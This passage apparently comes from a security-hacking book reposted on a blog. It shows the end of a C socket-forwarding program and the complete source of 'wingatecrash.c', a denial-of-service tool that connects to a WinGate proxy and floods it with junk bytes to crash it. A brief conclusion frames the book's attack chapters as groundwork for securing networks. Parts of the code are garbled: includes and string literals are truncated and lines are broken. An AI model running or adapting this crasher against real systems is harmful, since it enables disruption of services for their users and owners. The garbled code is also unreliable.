length = recv (insocket, buffer, sizeof (buffer), 0); if (length == -1 || length == 0) break;
if ((send (outsocket, buffer, length, 0)) == -1) break;
}
if (FD_ISSET (outsocket, &rfds))
length = recv (outsocket, buffer, sizeof (buffer), 0);
if (length == -1 || length == 0)
break;
if ((send (insocket, buffer, length, 0)) == -1) break;
close (listensocket); close (insocket); close (outsocket);
}
wingatecrash.c
#include
main (int argc, char *argv[]) { int sockfd;
struct sockaddr_in staddr; int port;
struct hostent *tmp_host; unsigned long int addr; int connfd; int i;
printf("Wingate crasher by holobyte
if (argc != 2 && argc != 3) { printf("Usage: %s
if (argc == 2) { port=23; } else { port=atoi(argv[2]); }
if (!(port > 0 && port < 65536)) { printf("Invalid port\n"
);
exit(2); }
/* If this returns -1 we'll try to look it up. I don't assume
anyone will be putting in 255.255.255.255, so I'll go wi
th
inet_addr() */ bzero(&staddr,sizeof(staddr));
if ((staddr.sin_addr.s_addr = inet_addr(argv[1])) == -1) { tmp_host = gethostbyname(argv[1]);
if (tmp_host == NULL) { printf("Could not get vali
d addr
info on %s: tmp_host\n",argv[1]); exit(7);} else {
memcpy((caddr_t
*)&staddr.sin_addr.s_addr,tmp_host->h_addr,tmp_host->h_length);
if (staddr.sin_addr.s_addr == -
1) { printf("Could
not valid addr info on %s: addr -1\n",argv[1]); exit(8); } }
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("Socket"); exit(3); }
staddr.sin_family = AF_INET; staddr.sin_port = htons(port);
if (connect(sockfd, (struct sockaddr *) &staddr, sizeof(sta
ddr))
< 0) { perror("Connect"); exit(4); } printf("Connected... Crashing"); for (i=0;i<100;i++) {
if
((write(sockfd,"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",44) ) <
0) { perror("Write"); exit(5); } putc('.',stdout);
fflush(stdout);
}
if (write(sockfd,"\n",1) < 0) { perror("Final Write"); exi
t(6); }
putc('\n',stdout);
fflush(stdout);
close(sockfd);
}
Conclusion
In this part together we explored cloak-and-dagger hack attack penetrations for gateways, routers, Internet service daemons, operating systems, proxies, and firewalls. The technology primers introduced earlier in this book, combined with countless hacker vulnerability secrets, should help formulate the necessary security groundwork as you implement all you've learned in the real world. Whether you're planning to secure your personal PC, your company network, and/or client's infrastructure, follow me to the final chapter as we get acquainted with the tools required to perform security hacking analyses.
No comments:
Post a Comment